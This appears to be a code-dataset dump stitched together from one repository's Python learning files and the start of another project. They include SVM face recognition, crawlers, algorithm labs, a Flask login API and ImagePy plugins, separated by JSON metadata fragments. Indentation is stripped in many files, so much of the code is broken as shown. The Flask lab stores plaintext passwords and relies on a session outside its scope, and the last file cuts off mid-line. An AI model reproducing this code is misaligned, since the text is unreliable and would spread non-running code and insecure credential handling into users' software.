# Model evaluation metrics: F1-score, recall, ROC curve, PR curve
from sklearn.metrics import classification_report, roc_curve, auc, f1_score, recall_score
class FaceRecognition:
    # Initialize parameters
    def __init__(self, photo_path, save_file='data.txt'):
        """
        :param photo_path: path to the face images
        :param save_file: file name for the images converted to a 2D data matrix
        """
        self.path = photo_path
        self.save_file = save_file
        self.y_test = None
        self.y_predict = None
        self.model = None  # stores the final trained model
    # Preprocess the data: convert the image data into a 2D matrix
def handle_data(self):
        # The label column is appended as the last column of the matrix
        label_list = []
        # Each image's feature row vector is stacked, giving a (400, 10305) 2D feature matrix
        stack_matrix = np.array([[0]])
for i in range(1, 41):
            # Append this image's label
label_list.append(i)
class_matrix = np.array(label_list, ndmin=2)
for j in range(1, 11):
self.path = photo_path.format(i, j)
x = Image.open(self.path)
                # Convert to an ndarray and reshape into a 2D row vector
                data = np.reshape(np.asarray(x), (1, -1))
                # print(x_data.shape)  # the shape here is (1, 10304)
                one_data = np.column_stack((data, class_matrix))
                # Do not stack on the first iteration
if i == 1 and j == 1:
stack_matrix = one_data
continue
stack_matrix = np.row_stack((stack_matrix, one_data))
label_list.pop()
np.savetxt(self.save_file, stack_matrix)
    # Load the preprocessed data
    def load_data(self):
        file = self.save_file
        # Read the preprocessed 2D image matrix file
        train_data = np.loadtxt(file)
        data = train_data[:, :10304]  # feature data
        target = train_data[:, -1]  # label data
return data, target
    # Train the model, return the accuracy and the model, and print evaluation metrics such as F1-score and recall
    def train_model(self, n_components=50, random_state=14):
        """
        :param n_components: number of dimensions kept by PCA
        :param random_state: random seed, tuned to obtain the best model
        :return: the accuracy and the model
        """
x_data, y_data = self.load_data()
x_train, x_test, y_train, self.y_test = train_test_split(x_data, y_data,
test_size=0.3,
random_state=random_state)
        # Use PCA to reduce the features to 50 dimensions
pca = PCA(n_components=n_components)
x_train = pca.fit_transform(x_train)
        self.model = SVC(kernel='rbf', C=10)  # C is the penalty parameter
self.model.fit(x_train, y_train)
        # Reduce the test data with the PCA fitted on the training set, so the same transform matrix is used
x_test_pca = pca.transform(x_test)
self.y_predict = self.model.predict(x_test_pca)
score = self.model.score(x_test_pca, self.y_test)
print(classification_report(self.y_test, self.y_predict))
        '''
        Testing other algorithms for face recognition, e.g. a BP neural network classifier:
        from sklearn.neural_network import MLPClassifier
        for i in range(450, 600, 10):
            bp = MLPClassifier(hidden_layer_sizes=(500, 300),
                               max_iter=i,
                               solver='adam',
                               random_state=15)
            bp.fit(x_train, y_train)
            print('After {} iterations, BP network accuracy on the test set: {}'.format(i, bp.score(x_test_pca, self.y_test)))
        '''
return score, self.model
    # Plot the ROC curve
def draw_ROC(self):
fpr, tpr, thresholds = roc_curve(self.y_test, self.y_predict, pos_label=40)
roc_auc = auc(fpr, tpr)
plt.title('ROC')
plt.plot(fpr, tpr, 'b', label='AUC = %0.4f' % roc_auc)
plt.legend(loc='lower right')
plt.plot([0, 1], [0, 1], 'r--')
plt.ylabel('TPR')
plt.xlabel('FPR')
plt.show()
    # Print the model evaluation metrics
def model_evaluation(self):
print('recall: %.4f' % recall_score(self.y_test, self.y_predict, average='micro'))
print('f1-score: %.4f' % f1_score(self.y_test, self.y_predict, average='micro'))
if __name__ == '__main__':
    # Pass in the image path pattern and the file name to save the matrix to
photo_path = './ORL/s{}_{}.bmp'
save_file = 'data.txt'
recognition = FaceRecognition(photo_path=photo_path, save_file=save_file)
# recognition.handle_data()
recognition.load_data()
acc, model = recognition.train_model(50, 14)
    print('Prediction accuracy on the test set: {}'.format(acc))
recognition.draw_ROC()
recognition.model_evaluation()
    # Hyper-parameter tuning
# l = []
# for i in range(10, 30):
# print(i, end=': ')
# acc = recognition.train_model(random_state=i)
# if acc >= 0.983:
# l.append({i: acc})
#
# print(l)
``` |
{
"source": "JimouChen/python-application",
"score": 4
} |
#### File: Base/Thread/threading_test.py
```python
import threading
from time import sleep
# Subclass threading.Thread
class MyThread(threading.Thread):
def __init__(self, thread_name):
super().__init__()
self.thread_name = thread_name
def run(self):
print('thread start:' + self.getName() + '\t' + self.thread_name)
count = 5
while count:
sleep(1)
print(self.getName() + ' : count = %d' % count)
count -= 1
print('thread over...:' + self.getName())
thread_1 = MyThread('Thread 1')
thread_2 = MyThread('Thread 2')
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
```
#### File: PythonLearning/Base/yield.py
```python
def my_yield():
    print('generator called')
    yield 1  # the first next() stops here; the next call resumes from the following statement
yield 2
my_gen = my_yield()  # nothing is printed yet; the generator body only runs on the first next()
print(next(my_gen))  # prints 'generator called', then 1
print(next(my_gen))  # prints 2
for i in my_yield():
print(i)
# -------------------------------------------------------
def fab(n):
a = 0
b = 1
while True:
if a < n:
a, b = b, a + b
yield a
else:
break
for each in fab(100):
print(each)
```
#### File: PythonLearning/ClassTest/test_inherit.py
```python
class Fish:
def __init__(self):
print('123456')
class Shark(Fish):
def __init__(self, name):
self.name = name
super().__init__()
def move(self, time):
self.time = time
print(self.name + ' is swimming for ' + str(self.time))
shark = Shark('skkk')
shark.move(5)
```
#### File: PythonLearning/Crawler/bs4_lgcrawler.py
```python
import requests
from bs4 import BeautifulSoup
import pandas as pd
# Fetch the page source
def get_html(url):
try:
res = requests.get(url, timeout=30)
        res.encoding = 'gb2312'  # the site is GB 2312 encoded
return res.text
except:
return ''
def parse_html(html):
soup = BeautifulSoup(html, 'lxml')
tr_list = soup.find_all('tr', attrs={"bgcolor": "#FFFFFF"})
    # Collect all house records
houses = []
for tr in tr_list:
house = {}
        # detailed address
house["详细地址"] = tr.find_all('a',
attrs={"target": "_blank"})[0].string
        # detail page link
print(house["详细地址"])
house["详情链接"] = "http://www.lgfdcw.com/cs/" + \
tr.find_all('a', attrs={"target": "_blank"})[0].attrs["href"]
        # house type
house["房型"] = tr.find_all("td")[2].string
        # layout
house["户型"] = tr.find_all("td")[3].string
        # area
house["面积"] = tr.find_all("td")[4].string[:-2] + "平方米"
        # sale price
price = tr.find_all("td")[5].string
if price is not None:
house["出售价格"] = price.strip()
        # registration date
house["登记时间"] = tr.find_all("td")[6].string
houses.append(house)
return houses
def save_file(dic):
# df = pd.DataFrame(dic, columns=["详细地址 ", "详情链接 ", "房型 ", " 户型 ", "面积 ", "出售价格 ", "登记时间 "])
# print(df)
df = pd.DataFrame(dic)
df.to_excel(r'D:/大学/软件工程/python数据分析与应用/pythonDataAnalysis/Test/house.xlsx')
def main():
    # Fetch the page
html = get_html('http://www.lgfdcw.com/cs/index.php?PageNo=1')
    # Parse the page
res = parse_html(html)
print(res)
    # Save locally
save_file(res)
main()
```
#### File: PythonLearning/Crawler/crawl_book.py
```python
import requests
import re
import pandas
def get_html_text(url):
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
headers = {'User-Agent': user_agent}
    # Send the request
respond = requests.get(url=url, headers=headers)
respond.encoding = 'GBK'
html_text = respond.text
return html_text
def match_text(html_text):
# article = []
    # The capture-group parentheses around .+? are required to extract the content
pattern = re.compile(r'<p>(.+?)</p>')
msg = pattern.findall(html_text)[0]
    # Extract the chapter title
pattern2 = re.compile(r'<p id="bktitle">(.+?)</p>')
title = pattern2.findall(html_text)[0]
# article.append({'标题': title, '内容': msg})
# article.append(title)
# article.append(msg)
# return article
return title + '\n' + msg + '\n'
def next_url(html_text):
pattern = re.compile(r">下一篇:<a href='(.+?)'>第")
next_page = pattern.findall(html_text)
return next_page
if __name__ == '__main__':
all_content = []
url = 'http://www.newxue.com/baike/12454027234683.html'
# html_text = get_html_text(url)
# massage = match_text(html_text)
    # Save as a txt file
file = open('SGYY_book.txt', 'w')
while url:
try:
html_text = get_html_text(url)
massage = match_text(html_text)
print(massage)
file.write(massage)
all_content.append(massage)
url = next_url(html_text)[0]
except Exception:
            print('Crawling finished')
break
print(all_content)
# save = pandas.DataFrame(all_content)
# save.to_excel('SGYY_book.xls')
file.close()
```
#### File: Design and Analysis of Algorithms/lab/lab1.py
```python
num = [0 for i in range(100)]
temp = [0 for i in range(100)]
count = 0
def merge(low, high, mid):
    left = low  # pointer into the left half
    right = mid + 1  # pointer into the right half
    k = low  # pointer into the temp array
global count
while left <= mid and right <= high:
if num[left] > num[right]:
temp[k] = num[right]
k += 1
right += 1
            # count inversions
count += mid - left + 1
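            # e.g. merging [3, 5] with [2]: when 2 is placed before num[left] = 3, every element
            # still remaining in the left half (3 and 5, i.e. mid - left + 1 of them) is larger
            # than 2 and therefore forms an inversion with it.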
else:
temp[k] = num[left]
k += 1
left += 1
    # drain the left half
while left <= mid:
temp[k] = num[left]
k += 1
left += 1
    # drain the right half
while right <= high:
temp[k] = num[right]
k += 1
right += 1
    # copy back
for i in range(low, high + 1):
num[i] = temp[i]
def merge_sort(low, high):
if low >= high:
return
    # divide
mid = (high + low) // 2
# mid = low + (high - low) // 2
merge_sort(low, mid)
merge_sort(mid + 1, high)
    # conquer (merge)
merge(low, high, mid)
if __name__ == '__main__':
# array = [3, 5, 2, 4, 6]
    # read input
num = list(map(int, input().split()))
merge_sort(0, len(num) - 1)
print(count)
'''
3 5 2 4 6
3
'''
```
#### File: Design and Analysis of Algorithms/lab/lab6.py
```python
class Node:
def __init__(self, pos, val, weight, path):
self.pos = pos
self.val = val
self.weight = weight
        self.path = path  # records which supplier was chosen for each part
value = [[0 for _ in range(100)] for _ in range(100)]
weight = [[0 for _ in range(100)] for _ in range(100)]
Max = 99999999
res = Node(0, Max, Max, '')  # initialize the best result to "infinity"
def bfs():
global res
queue = [Node(1, 0, 0, '')]
while len(queue):
temp_node = queue[0]
queue.pop(0)
p, v, w = temp_node.pos, temp_node.val, temp_node.weight
if p == n + 1:
if (temp_node.weight < res.weight) or (temp_node.weight == res.weight) and (temp_node.val < res.val):
res = temp_node
continue
for i in range(1, m + 1):
new_val = v + value[p][i]
new_weight = w + weight[p][i]
if (new_val > d) or (new_weight > res.weight):
continue
queue.append(Node(p + 1, new_val, new_weight, temp_node.path + str(i)))
if __name__ == '__main__':
    # number of parts, number of suppliers, and the maximum total price
    print('Enter the number of parts, the number of suppliers, and the maximum total price:')
n, m, d = map(int, input().split())
    # price of each part at each supplier
    print('Enter the price of each part at each supplier:')
for i in range(1, n + 1):
temp_list = list(map(int, input().split()))
for j in range(1, m + 1):
value[i][j] = temp_list[j - 1]
    # weight of each part at each supplier
    print('Enter the weight of each part at each supplier:')
for i in range(1, n + 1):
temp_list = list(map(int, input().split()))
for j in range(1, m + 1):
weight[i][j] = temp_list[j - 1]
bfs()
    print('Minimum total weight:', res.weight)
    print('The suppliers chosen for parts 1-4 are:')
for i in res.path:
print(i)
'''
4 3 28
9 7 5
10 8 7
5 8 9
4 7 5
3 2 1
2 1 1
1 2 2
1 2 2
3 3 4
1 2 3
3 2 1
2 2 2
1 2 3
3 2 1
2 2 2
Enter the number of parts, the number of suppliers, and the maximum total price:
4 3 21
Enter the price of each part at each supplier:
4 5 6
1 2 3
4 4 6
2 1 3
Enter the weight of each part at each supplier:
3 4 5
5 3 2
1 2 3
1 9 2
Minimum total weight: 7
'''
```
#### File: Design and Analysis of Algorithms/week2/Q2_4.py
```python
def T(n):
if n == 1:
return 4
elif n > 1:
return 3 * T(n - 1)
def T(n):
if n == 1:
return 1
elif n > 1:
return 2 * T(n // 3) + n
print(T(5))
```
#### File: OJ/competition/A.py
```python
import math
def f(n):
if n == 1:
return 1
sum1 = 0
for i in range(1, n):
sum1 += (math.gcd(i, n - i) == 1)
return sum1 % 1000000007
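# Note: gcd(i, n - i) == gcd(i, n), so for n > 1 f(n) counts the integers in [1, n)
# that are coprime to n, i.e. Euler's totient function phi(n).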
def g(n):
sum1 = 0
for i in range(1, n + 1):
if n % i == 0:
sum1 += f(n // i)
return sum1 % 1000000007
def G(n, k):
if k == 1:
return f(g(n)) % 1000000007
elif k > 1 and k % 2 == 0:
return g(G(n, k - 1)) % 1000000007
elif k > 1 and k % 2 == 1:
return f(G(n, k - 1)) % 1000000007
t = int(input())
a = 1
while t:
n, k = map(int, input().split())
print(G(n % 1000000007, k % 1000000007))
t -= 1
```
#### File: PythonLearning/OJ/Joseph.py
```python
def joseph_by_array(n, m):
a = [0 for _ in range(n + 1)]
    cnt = 0  # number of people eliminated so far
    i, k = 0, 0  # a[i] is the person counting off, k is the current count (starting from 1)
while cnt != n:
i += 1
if i > n:
i = 1
if a[i] == 0:
k += 1
if k == m:
a[i] = 1
cnt += 1
print(i, end=" ")
                k = 0  # restart counting from 1
# Index method: remove_index = (remove_index + m - 1) % len(number)
def joseph_by_index(n, m):
number = [_ for _ in range(1, n + 1)]
out_index = 0
while len(number):
out_index = (out_index + m - 1) % len(number)
print(number[out_index], end=" ")
number.remove(number[out_index])
# Formula (recurrence) method, faster still: f(n, m) = (f(n - 1, m) + m) mod n
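# A sketch of that recurrence (added for illustration): it yields only the number of the
# last survivor, not the full elimination order printed by the two functions above.
def joseph_by_formula(n, m):
    pos = 0  # survivor's 0-based index when only one person remains
    for size in range(2, n + 1):
        pos = (pos + m) % size
    return pos + 1  # convert to the 1-based numbering used above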
if __name__ == '__main__':
person_num, out_num = map(int, input().split())
joseph_by_array(person_num, out_num)
print()
joseph_by_index(person_num, out_num)
```
#### File: OJ/test_all/test_task.py
```python
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
p = head
all_val = []
while p:
q = ListNode(0)
q.val = p.val
all_val.append(q)
p = p.next
all_val.remove(all_val[len(all_val) - n])
if len(all_val) == 0:
return None
for i in range(len(all_val) - 1):
all_val[i].next = all_val[i + 1]
return all_val[0]
a = Solution()
t1 = ListNode(1)
t2 = ListNode(2)
# t3 = ListNode(3)
# t4 = ListNode(4)
# t5 = ListNode(5)
t1.next = t2
# t2.next = t3
# t3.next = t4
# t4.next = t5
a.removeNthFromEnd(t1, 1)
```
#### File: FlaskProject/testlab/lab5.py
```python
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from flask import Flask, jsonify, request, abort
from requests import Session
from sqlalchemy.orm import sessionmaker
engine = create_engine('sqlite:///rest1.db')
Base = declarative_base()
app = Flask('test_app')
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
name = Column(String)
password = Column(String)
token = Column(String)
# Register
@app.route("/register/", methods=('POST',))
def user_create():
name = request.form.get('name')
    password = request.form.get('password')
token = request.form.get('token')
if name and password and token:
session = Session()
user = User(name=name, password=password, token=token)
session.add(user)
session.commit()
return jsonify({
'status': 201,
'data': {
'id': user.id,
'name': user.name
}
})
else:
abort(401)
# Log in
@app.route('/login/', methods=('GET',))
def login():
name = request.form.get('name')
password = request.form.get('password')
token = request.form.get('token')
for i in Session().query(User):
        if name == i.name and password == i.password:
            # replace the token
user = session.query(User).filter(User.name.like(name)).first()
user.token = token
session.commit()
return jsonify({
'status': 200,
'data': {
'id': i.id,
'token': i.token
}
})
# Verify login
@app.route("/judge/", methods=('GET',))
def judge():
token = request.form.get('token')
id_ = request.form.get('id')
if token and id_:
for i in Session().query(User):
            # check whether the token and id match
if i.token == token and str(i.id) == id_:
return jsonify({
'status': 200
})
    # login verification fails if the token or id is wrong, or the input is empty
return jsonify({
'status': 401
})
# Log out via PUT
@app.route('/put/', methods=('PUT',))
def delete():
token = request.form.get('token')
name = request.form.get('name')
if token and name:
for i in Session().query(User):
            # if the token and name match, clear the token
if i.token == token and i.name == name:
user = session.query(User).filter(User.id.like(i.id)).first()
# session.delete(user)
user.token = ''
session.commit()
return jsonify({
'status': 204
})
if __name__ == '__main__':
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
app.run()
```
#### File: FlaskProject/testlab/test.py
```python
from flask import Flask, jsonify
app = Flask('test_app')
@app.route('/')
def hello():
return jsonify({
'hello': 'world'
})
@app.route('/<string:name>/')
def test(name: str = None):
local_ver = []
for i in range(len(name)):
local_ver.append(i * '*+')
return jsonify({
'hello ya': name,
'local': local_ver
})
if __name__ == '__main__':
app.run()
```
#### File: testScrapy/spiders/douban_comment.py
```python
import scrapy
from bs4 import BeautifulSoup
from testScrapy.items import TestscrapyItem
class CommentSpider(scrapy.Spider):
name = 'comment_spider'
start_urls = ['https://book.douban.com/subject/35092383/annotation']
custom_settings = {
"USER_AGENT": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',
}
page_num = 1
def parse(self, response, **kwargs):
soup = BeautifulSoup(response.body, 'html.parser')
nodes = soup.find_all('div', {'class': 'short'})
print('======================{}======================'.format(self.page_num))
for node in nodes:
comment = node.find('span').text
            # save
item = TestscrapyItem(page_num = self.page_num, comment=comment)
yield item
# print(comment, end='\n\n')
self.page_num += 1
        # link to the next page
num = 10 * self.page_num
if self.page_num <= 28:
url = 'https://book.douban.com/subject/35092383/annotation?sort=rank&start=' + str(num)
yield scrapy.Request(url, callback=self.parse)
#
# print('保存完毕')
```
#### File: lab3/spiders/spider_msg.py
```python
import scrapy
from bs4 import BeautifulSoup
from lab3.items import Lab3Item
class QuoteSpider(scrapy.Spider):
name = 'quotes'
start_urls = ['http://quotes.toscrape.com/page/1/']
page_num = 1
    # Parse the crawled response
def parse(self, response, **kwargs):
soup = BeautifulSoup(response.body, 'html.parser')
nodes = soup.find_all('div', {'class': 'quote'})
for node in nodes:
text = node.find('span', {'class': 'text'}).text
author = node.find('small', {'class': 'author'}).text
tags = node.find_all('a', {'class': 'tag'})
tags_list = []
for tag in tags:
tags_list.append(tag.text)
            # find the author link and crawl the author page
author_link = 'http://quotes.toscrape.com/' + node.find_all('span')[1].a['href']
            # hand off to author_parse
yield response.follow(author_link, self.author_parse)
# print('{0:<4}:{1:<20} said:{2:<20}\n{3}'.format(self.page_num, author, text, tags_list))
item = Lab3Item(author=author, text=text, tags=tags_list)
yield item
print('=' * 80 + 'page:',self.page_num,'saved successfully!' + '=' * 80)
        # crawl the link to the next page
try:
self.page_num += 1
url = soup.find('li', {'class': 'next'}).a['href']
if url:
next_link = 'http://quotes.toscrape.com/' + url
yield scrapy.Request(next_link, callback=self.parse)
except Exception:
            print('All pages have been crawled!')
def author_parse(self, response, **kwargs):
soup = BeautifulSoup(response.body, 'html.parser')
author_name = soup.find_all('div', {'class': 'author-details'})[0].find('h3').text
birthday = soup.find('span').text
bio = soup.find('div', {'class': 'author-description'}).text
# print('{}: {}\n{}\n{}\n'.format(self.page_num, author_name, birthday, bio))
item = Lab3Item(name=author_name, birthday=birthday, bio=bio)
yield item
```
#### File: python-application/TestExample/test_.py
```python
z = [0.60553896,-0.22906616,1.86852386]
print(sum(z))
``` |
{
"source": "jimpassmore/imagepy",
"score": 2
} |
#### File: core/roi/roi.py
```python
from .convert import roi2shape, shape2roi
def affine(body, m, o):
if isinstance(body, list):
return [affine(i, m, o) for i in body]
if isinstance(body, tuple):
return tuple(m.dot(body)+o)
class ROI:
def __init__(self):pass
def buffer(self, r):
return shape2roi(roi2shape(self).buffer(r, 4))
def convex(self):
return shape2roi(roi2shape(self).convex_hull)
def bounds(self):
from .rectangleroi import RectangleRoi
box = roi2shape(self).bounds
return RectangleRoi(*box)
def clip(self, rect):
return shape2roi(roi2shape(rect).intersection(roi2shape(self)))
def invert(self, rect):
return shape2roi(roi2shape(rect).difference(roi2shape(self)))
def union(self, roi):
return shape2roi(roi2shape(roi).union(roi2shape(self)))
def diff(self, roi):
return shape2roi(roi2shape(self).difference(roi2shape(roi)))
```
#### File: imagepy/imagepy/IPy.py
```python
from __future__ import absolute_import
from __future__ import print_function
import wx, os
from wx.lib.pubsub import pub
from .core import manager
from .imageplus import ImagePlus
from . import root_dir
curapp = None
def get_window():
return manager.WindowsManager.get()
def get_ips():
win = manager.WindowsManager.get()
return None if win==None else win.canvas.ips
def showips(ips):
from .ui.canvasframe import CanvasFrame
frame = CanvasFrame(curapp)
frame.set_ips(ips)
frame.Show()
pub.subscribe(showips, 'showips')
def show_ips(ips):
wx.CallAfter(pub.sendMessage, 'showips', ips=ips)
def showimg(imgs, title):
print('show img')
ips = ImagePlus(imgs, title)
showips(ips)
pub.subscribe(showimg, 'showimg')
def show_img(imgs, title):
wx.CallAfter(pub.sendMessage, 'showimg', imgs=imgs, title=title)
print('mes show img')
'''
def stepmacros(macros):
macros.next()
pub.subscribe(stepmacros, 'stepmacros')
def step_macros(macros):
wx.CallAfter(pub.sendMessage, "stepmacros", macros=macros)
'''
def alert(info, title="ImagePy Alert!"):
dlg=wx.MessageDialog(curapp, info, title, wx.OK)
dlg.ShowModal()
dlg.Destroy()
# MT alert = lambda info, title='image-py':callafter(alert_, *(info, title))
def yes_no(info, title="ImagePy Yes-No ?!"):
dlg = wx.MessageDialog(curapp, info, title, wx.YES_NO | wx.CANCEL)
rst = dlg.ShowModal()
dlg.Destroy()
dic = {wx.ID_YES:'yes', wx.ID_NO:'no', wx.ID_CANCEL:'cancel'}
return dic[rst]
def getpath(title, filt, k, para=None):
"""Get the defaultpath of the ImagePy"""
dpath = manager.ConfigManager.get('defaultpath')
if dpath ==None:
dpath = root_dir # './'
dic = {'open':wx.FD_OPEN, 'save':wx.FD_SAVE}
dialog = wx.FileDialog(curapp, title, dpath, '', filt, dic[k])
rst = dialog.ShowModal()
path = None
if rst == wx.ID_OK:
path = dialog.GetPath()
dpath = os.path.split(path)[0]
manager.ConfigManager.set('defaultpath', dpath)
if para!=None:para['path'] = path
dialog.Destroy()
return rst if para!=None else path
def getdir(title, filt, para=None):
dpath = manager.ConfigManager.get('defaultpath')
if dpath ==None:
dpath = root_dir
dialog = wx.DirDialog(curapp, title, dpath )
rst = dialog.ShowModal()
path = None
if rst == wx.ID_OK:
path = dialog.GetPath()
if para!=None:para['path'] = path
dialog.Destroy()
return rst if para!=None else path
def get_para(title, view, para):
from .ui.panelconfig import ParaDialog
pd = ParaDialog(curapp, title)
pd.init_view(view, para)
rst = pd.ShowModal()
pd.Destroy()
return rst
def showtable(title, data, cols=None, rows=None):
from .ui.tablewindow import TableLog
TableLog.table(title, data, cols, rows)
# MT callafter(TableLog.table, *(title, data, cols, rows))
pub.subscribe(showtable, 'showtable')
def table(title, data, cols=None, rows=None):
wx.CallAfter(pub.sendMessage, "showtable", title=title, data=data, cols=cols, rows=rows)
def showlog(title, cont):
from .ui.logwindow import TextLog
TextLog.write(cont, title)
pub.subscribe(showlog, 'showlog')
def write(cont, title='ImagePy'):
from .ui.logwindow import TextLog
wx.CallAfter(pub.sendMessage, 'showlog', title=title, cont=cont)
def plot(title, gtitle='Graph', labelx='X-Unit', labely='Y-Unit'):
from .ui.plotwindow import PlotFrame
return PlotFrame.get_frame(title, gtitle, labelx, labely)
#def set_progress(i):
# curapp.set_progress(i)
# MT callafter(curapp.set_progress, i)
def set_info(i):
curapp.set_info(i)
# MT callafter(curapp.set_info, i)
def run(cmd):
title, para = cmd.split('>')
manager.PluginsManager.get(title)().start(eval(para), False)
```
#### File: menus/Analysis/label_plg.py
```python
import numpy as np
from scipy.ndimage import label, generate_binary_structure
from imagepy import IPy
from imagepy.core.engine import Filter
from imagepy.imageplus import ImagePlus
from imagepy.ui.canvasframe import CanvasFrame
class Plugin(Filter):
title = 'Label Image'
note = ['8-bit', 'not_slice', 'preview']
para = {'thr':128, 'con':'4-Connect'}
view = [('slide', (0,255), 'Threshold', 'thr', ''),
(list, ['4-Connect','8-Connect'], str, 'Structure', 'con', 'connect')]
def load(self, ips):
self.lut = ips.lut
ips.lut = self.lut.copy()
return True
def preview(self, para):
self.ips.lut[:] = self.lut
self.ips.lut[para['thr']:] = [255,0,0]
self.ips.update = 'pix'
def run(self, ips, snap, img, para = None):
if para == None: para = self.para
ips.lut = self.lut
msk = img>para['thr']
con = 1 if para['con']=='4-Connect' else 2
strc = generate_binary_structure(2, con)
msk = label(msk, strc, output = np.int16)
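        # With an output dtype, scipy.ndimage.label returns (labeled_array, num_features), hence msk[0] below.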
IPy.show_img([msk[0]], ips.title+'-label')
```
#### File: Help/Language/language_plgs.py
```python
from imagepy import IPy
from imagepy.core.manager import ColorManager, LanguageManager
from imagepy.core.engine import Free
class Plugin(Free):
def __init__(self, key):
self.title = key
asyn = False
#process
def run(self, para = None):
LanguageManager.set(self.title)
IPy.curapp.reload_plugins()
def __call__(self):
return self
plgs = [Plugin(i) for i in list(LanguageManager.langs.keys())]
plgs.insert(0, Plugin('English'))
plgs.append('-')
class NewLanguage(Free):
title = 'New Language'
para = {'name':'your language'}
view = [(str, 'name', 'name','')]
def run(self, para = None):
LanguageManager.newdic(para['name'])
LanguageManager.write()
class UpdateDictionary(Free):
title = 'Update Dictionary'
def run(self, para = None):
LanguageManager.add()
LanguageManager.write()
class CleanDictionary(Free):
title = 'Clean Dictionary'
def run(self, para = None):
LanguageManager.rm()
LanguageManager.write()
plgs.extend([NewLanguage, UpdateDictionary, CleanDictionary])
print(plgs)
if __name__ == '__main__':
print(list(ColorManager.luts.keys()))
```
#### File: Image/Type/convert_plg.py
```python
import numpy as np
from imagepy.core.engine import Simple
from imagepy import IPy
class To8bit(Simple):
title = '8-bit'
note = ['rgb']
def run(self, ips, imgs, para = None):
n = ips.get_nslices()
if ips.is3d:
img8 = np.zeros(ips.size+(n,), dtype=np.uint8)
for i in range(n):
self.progress(i, len(imgs))
img8[i] = imgs[i].mean(axis=2)
else:
img8 = []
for i in range(n):
self.progress(i, len(imgs))
img8.append(imgs[i].mean(axis=2).astype(np.uint8))
ips.set_imgs(img8)
class ToRGB(Simple):
title = 'RGB'
note = ['8-bit']
def run(self, ips, imgs, para = None):
n = ips.get_nslices()
if ips.is3d:
rgb = np.zeros(ips.size+(n,), dtype=np.uint8)
for i in range(n):
IPy.curapp.set_progress(round((i+1)*100.0/len(imgs)))
rgb[i] = ips.lut[imgs[i]]
else:
rgb = []
for i in range(n):
IPy.curapp.set_progress(round((i+1)*100.0/len(imgs)))
rgb.append(ips.lut[imgs[i]])
IPy.curapp.set_progress(0)
ips.set_imgs(rgb)
plgs = [To8bit, ToRGB]
```
#### File: Plugins/3D Viewer/surface3d_plg.py
```python
from imagepy.core.engine import Filter
from imagepy import IPy
from imagepy.core import myvi
import numpy as np
class Plugin(Filter):
modal = False
title = '3D Surface'
note = ['8-bit', 'not_slice', 'not_channel', 'preview']
    para = {'name':'undefined', 'ds':2, 'thr':128, 'step':1, 'color':(0,255,0)}
view = [(str, 'Name', 'name',''),
('slide', (0,255), 'threshold', 'thr', ''),
(int, (1,20), 0, 'down scale', 'ds', 'pix'),
(int, (1,20), 0, 'march step', 'step', 'pix'),
('color', 'color', 'color', 'rgb')]
def load(self, ips):
if not ips.is3d:
IPy.alert('stack3d required!')
return False
self.frame = myvi.Frame3D.figure(IPy.curapp, title='3D Canvas')
self.buflut = ips.lut
ips.lut = ips.lut.copy()
return True
def preview(self, para):
self.ips.lut[:] = self.buflut
self.ips.lut[:para['thr']] = [255,0,0]
self.ips.update = 'pix'
def run(self, ips, snap, img, para = None):
imgs = ips.imgs
def cancel(self, ips):
ips.lut = self.buflut
ips.update = 'pix'
def run(self, ips, snap, img, para = None):
ips.lut = self.buflut
print('------------', para['color'])
cs = tuple([int(i/255.0) for i in para['color']])
vts, fs, ns, cs = myvi.build_surf3d(ips.imgs, para['ds'], para['thr'], para['step'], cs)
self.frame.viewer.add_surf_asyn(para['name'], vts, fs, ns, cs)
self.frame = None
'''
def run(self, ips, imgs, para = None):
from mayavi import mlab
volume = mlab.pipeline.scalar_field(ips.imgs)
if para['sigma']!=0:
volume = mlab.pipeline.user_defined(volume, filter='ImageGaussianSmooth')
volume.filter.standard_deviations = [para['sigma']]*3
c = tuple([i/255.0 for i in para['color']])
contour = mlab.pipeline.iso_surface(volume, contours=[para['thr']],
color=c, opacity=para['opa'])
mlab.show()
'''
if __name__ == '__main__':
pass
```
#### File: Plugins/Manager/console_plg.py
```python
import wx
from wx.py.shell import ShellFrame
import scipy.ndimage as ndimg
import numpy as np
from imagepy import IPy
from imagepy.core.engine import Free
from imagepy.core.manager import PluginsManager
## There is something wrong!
## To be fixed!
def get_ips():
ips = IPy.get_ips()
if ips is None:
print('no image opened!')
return ips
def update():
ips = IPy.get_ips()
if not ips is None :
ips.update='pix'
class Macros(dict):
def __init__(self):
for i in list(PluginsManager.plgs.keys()):
if not isinstance(i, str) or i == 'Command Line':
#print(PluginsManager.plgs[i])
continue
name = ''.join(list(filter(str.isalnum, i)))
### TODO:Fixme!
#exec('self.run_%s = lambda para=None,
# plg=PluginsManager.plgs[i]:plg().start(para)'%name)
#self['run_%s'%i] = lambda para=None, plg=PluginsManager.plgs[i]:plg().start(para)
exec('self.run_%s = lambda para=None, plg=PluginsManager.plgs[i]:plg().start(para)'%name)
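            # Binding plg=PluginsManager.plgs[i] as a default argument freezes the plugin at
            # definition time, avoiding the late-binding pitfall of closing over the loop variable.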
#exec('self._%s = PluginsManager.plgs[i]().start'%name)
print(self)
cmds = {'IPy':IPy, 'ndimg':ndimg, 'update':update, 'curips':get_ips}
class Plugin(Free):
title = 'Command Line'
asyn = False
def load(self):
cmds['plgs'] = Macros()
return True
def run(self, para=None):
frame = ShellFrame(IPy.curapp, locals=cmds)
frame.shell.run('# numpy(np) and scipy.ndimage(ndimg) has been imported!\n')
frame.shell.run('# plgs.run_name() to call a ImagePy plugin.\n')
frame.shell.run('# IPy is avalible here, and curips() to get the current ImagePlus, update() to redraw.\n')
frame.Show(True)
```
#### File: menus/Plugins/update_plg.py
```python
from imagepy import IPy
from imagepy.core.engine import Free
class Update(Free):
title = 'Update Software'
def load(self):
try:
from dulwich.repo import Repo
from dulwich.client import get_transport_and_path
self.repo, self.trans = Repo, get_transport_and_path
except:
